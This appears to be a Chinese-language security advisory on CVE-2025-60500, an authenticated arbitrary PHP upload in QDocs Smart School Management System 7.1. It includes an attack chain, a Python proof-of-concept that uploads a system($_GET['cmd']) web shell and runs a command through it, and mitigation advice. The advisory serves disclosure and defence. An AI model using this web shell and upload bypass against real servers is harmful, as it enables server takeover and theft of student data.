CVE-2025-60500：QDocs智能学校管理系统任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-60500

漏洞类型

任意文件上传/远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

QDocs Smart School Management System

漏洞概述

CVE-2025-60500是QDocs Smart School Management System 7.1版本中存在的一个高危安全漏洞。该漏洞源于系统媒体上传功能中的逻辑缺陷，允许已认证的用户（如具有"accountant"会计或"admin"管理员角色的用户）绕过文件类型限制检查。具体而言，攻击者可以利用系统中提供的"备用YouTube URL"选项（alternate YouTube URL option）作为攻击向量，绕过原本应限制上传文件类型的安全机制，从而成功上传任意PHP文件。由于上传的文件被存储在Web可访问目录中，攻击者可以通过直接访问上传的PHP文件来执行任意服务器端代码，导致远程代码执行（RCE）。该漏洞的CVSS 3.1评分为7.2，属于高危级别，其向量为AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H，表明该漏洞通过网络可利用，攻击复杂度低，需要高权限（已认证用户），无需用户交互，对机密性、完整性和可用性均产生高影响。该漏洞对使用QDocs管理系统的教育机构构成严重威胁，可能导致敏感学生数据泄露、系统被完全控制以及进一步的网络攻击。

技术细节

QDocs Smart School Management System 7.1的媒体上传功能存在逻辑漏洞。正常情况下，系统应当对上传的媒体文件进行严格的类型校验，仅允许图片、视频等合法文件类型上传。然而，该功能同时提供了一个"备用YouTube URL"选项，允许用户通过提供YouTube链接的方式来添加媒体内容。攻击者利用这一设计缺陷，将恶意PHP文件伪装或关联为YouTube URL提交，从而绕过文件类型验证机制。

具体利用过程如下：
1. 攻击者首先使用有效的凭证（如accountant或admin账户）登录系统；
2. 导航至媒体上传功能模块；
3. 选择"备用YouTube URL"选项，而非正常的文件上传选项；
4. 通过该选项提交包含恶意PHP代码的文件，实际上传任意PHP文件到服务器；
5. 系统未对通过此途径上传的文件进行适当的安全检查，将PHP文件存储在Web可公开访问的目录中；
6. 攻击者随后通过浏览器直接访问上传的PHP文件路径，触发服务器执行其中的恶意代码。

由于该漏洞需要已认证的账户才能利用（PR:H），因此降低了其整体风险评分，但一旦拥有合法账户（如通过钓鱼、社会工程或弱密码攻陷获得），攻击者可完全控制服务器。

攻击链分析

STEP 1

步骤1：获取合法凭证

攻击者通过钓鱼、社会工程、暴力破解或购买泄露凭证等方式，获取QDocs系统的合法账户（如accountant或admin角色账户）。

STEP 2

步骤2：登录系统

使用获取的凭证登录QDocs Smart School Management System管理后台。

STEP 3

步骤3：导航至媒体上传功能

访问系统中的媒体上传页面，定位到提供"备用YouTube URL"选项的上传功能。

STEP 4

步骤4：绕过文件类型验证

选择"备用YouTube URL"选项而非正常文件上传，利用该选项的逻辑缺陷，将恶意PHP文件作为附件提交，绕过文件类型白名单检查。

STEP 5

步骤5：上传Web Shell

系统接受并存储PHP文件到Web可公开访问的目录中，攻击者获得一个可远程访问的Web Shell。

STEP 6

步骤6：执行远程代码

通过浏览器或命令行工具访问上传的PHP文件，传入系统命令参数，执行任意服务器端代码，实现完全控制目标服务器。

STEP 7

步骤7：后期利用

窃取敏感数据（学生信息、财务记录）、植入持久化后门、横向移动至内网其他系统或发起拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60500 - QDocs Smart School Management System 7.1
# Arbitrary File Upload via YouTube URL Option Bypass
# Reference: https://github.com/H4zaz/CVE-2025-60500

import requests
from bs4 import BeautifulSoup
import re

TARGET_URL = "http://target-qdocs-server.com"
USERNAME = "accountant_user"
PASSWORD = "password123"

# Step 1: Login to the QDocs system
session = requests.Session()
login_url = f"{TARGET_URL}/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Get CSRF token from media upload page
upload_page_url = f"{TARGET_URL}/media/upload"
response = session.get(upload_page_url)
soup = BeautifulSoup(response.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrf_token'})['value']

# Step 3: Prepare malicious PHP payload disguised as YouTube URL
# The PHP payload will be uploaded via the alternate YouTube URL option
php_payload = """<?php
// Malicious PHP shell - uploaded via YouTube URL bypass
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""

# Step 4: Upload PHP file using the YouTube URL bypass
files = {
    'youtube_url': (None, 'https://www.youtube.com/watch?v=bypass'),
    'media_file': ('shell.php', php_payload, 'application/x-php')
}

upload_data = {
    'csrf_token': csrf_token,
    'upload_type': 'youtube_url',  # Abuse the YouTube URL option
    'youtube_url': 'https://www.youtube.com/watch?v=bypass'
}

response = session.post(upload_page_url, data=upload_data, files=files)
print(f"[*] Upload response status: {response.status_code}")

# Step 5: Access the uploaded PHP shell
shell_url = f"{TARGET_URL}/uploads/media/shell.php?cmd=id"
response = requests.get(shell_url)
print(f"[*] Shell execution result: {response.text}")

影响范围

QDocs Smart School Management System 7.1

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）限制媒体上传功能的访问权限，仅允许可信的管理员使用；2）在Web服务器配置中，禁止上传目录（如/uploads/）执行PHP脚本；3）部署WAF规则检测通过YouTube URL选项上传的可疑文件；4）对所有上传的文件实施二次人工审核；5）监控上传目录的文件变化，及时发现可疑的PHP文件；6）加强账户安全管理，强制所有特权账户启用强密码和MFA；7）定期审查系统日志，识别异常的认证和上传行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60500
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60500
3 Details https://www.cvedetails.com/cve/CVE-2025-60500/
4 VulDB https://vuldb.com/cve/CVE-2025-60500
5 Link https://github.com/H4zaz/CVE-2025-60500